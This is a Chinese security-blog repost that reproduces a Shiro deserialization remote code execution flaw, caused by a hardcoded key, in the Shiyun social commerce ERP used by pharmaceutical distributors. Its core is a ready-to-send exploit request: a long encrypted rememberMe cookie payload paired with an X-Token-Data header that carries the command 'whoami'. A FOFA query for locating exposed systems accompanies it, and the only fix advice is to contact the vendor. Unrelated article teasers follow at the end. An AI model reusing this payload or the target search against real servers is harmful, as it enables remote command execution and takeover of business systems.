云时空社会化商业 ERP 系统 Shiro 反序列化漏洞复现

news/2024/2/29 3:35:50

0x01 产品简介

   时空云社会化商业ERP(简称时空云ERP) ,该产品采用JAVA语言和Oracle数据库, 融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。

0x02 漏洞概述

   云时空社会化商业 ERP 系统存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="云时空社会化商业ERP系统"

0x04 漏洞复现 

Exp

GET /static/js/public.js HTTP/1.1
Host: your-ip
Cookie: rememberMe=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
X-Token-Data: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

0x05 修复建议

官方已出修复方案,联系官方获取修复补丁。http://www.ysk360.com/


https://www.xjx100.cn/news/3118766.html

相关文章

react-route-dom 实现简单的嵌套路由

最终效果 点击 to test1 点击to test2 > to test21 点击to test2 > to test22 代码如下 path: "page",element: <父组件 />,children: [{ path: "test1", element: <Test1 /> },{path: "test2",element: <Test2 />…

基于谷歌Flutter的媒体资讯APP的设计与实现

基于谷歌Flutter框架媒体资讯App的设计与实现 摘要&#xff1a; 当今社会&#xff0c;随着经济和科技的发展&#xff0c;人们的生活节奏也愈来愈快&#xff0c;人们生活的阅读时间也越来越少&#xff0c;越发的流行碎片化阅读&#xff0c;而同样的对于互联网的客户端开发者&am…

vscode一直不能跳转函数定义或者别的定义c_cpp_properties.json、settings.json

vscode好几天一直不能跳转函数定义或者别的定义&#xff0c;突然又好了。。。 c_cpp_properties.json {"configurations": [{"name": "windows-gcc-x86","includePath": ["${workspaceFolder}/**","D:/adas/ADAS_FUS…

保障海外业务发展,Coremail提供高效安全的海外通邮服务

11月22日&#xff0c;Coremail举办《全球通邮&#xff1a;如何保障安全、快捷的海外中继服务》直播分享会&#xff0c;直播会上Coremail安全团队和直播嘉宾复旦大学校园信息化办公室徐艺扬老师就海外中继服务进行了深度分享。 ​ 海外通邮困难重重 境外垃圾邮件数量居高不下…

BatchOutput PDF for Mac(PDF 批量处理软件)

BatchOutput PDF是一款适用于 Mac 的 PDF 批量处理软件。它可以帮助用户将多个 PDF 文件进行异步处理&#xff0c;提高工作效率。 BatchOutput PDF 可以自动化执行许多任务&#xff0c;包括 PDF 文件的打印、转换、分割、压缩、加密、重命名等&#xff0c;而且它还可以将自定义…

VsCode中使用功能vite创建vue3+js项目报错

VsCode中使用功能vite创建vue3js项目报错 VsCode中使用功能vite创建vue3js项目import模块报错如下处理方法 VsCode中使用功能vite创建vue3js项目import模块报错如下 处理方法 在项目根目录新建jsconfig.json {"compilerOptions": {"baseUrl": "./&q…

人工智能(pytorch)搭建模型21-基于pytorch搭建卷积神经网络VoVNetV2模型,并利用简单数据进行快速训练

大家好&#xff0c;我是微学AI&#xff0c;今天给大家介绍一下人工智能(pytorch)搭建模型21-基于pytorch搭建卷积神经网络VoVNetV2模型&#xff0c;并利用简单数据进行快速训练。VoVNetV2模型是计算机视觉领域的一个重要研究成果&#xff0c;它采用了Voice of Visual Residual&…

Python处理IP地址的利器IPy

文章目录 一、安装IPy二、IP类&#xff1a;处理单网段2.1 查看网段包含的IP地址2.2 查看地址是IPv4还是IPv62.3 格式化输出地址2.4 已知掩码求网段2.5 将IP地址转换为字符串2.6 处理IP地址段的包含关系 三、IPSet类&#xff1a;处理多网段3.1 多网段聚合处理3.2 判断多个网段是…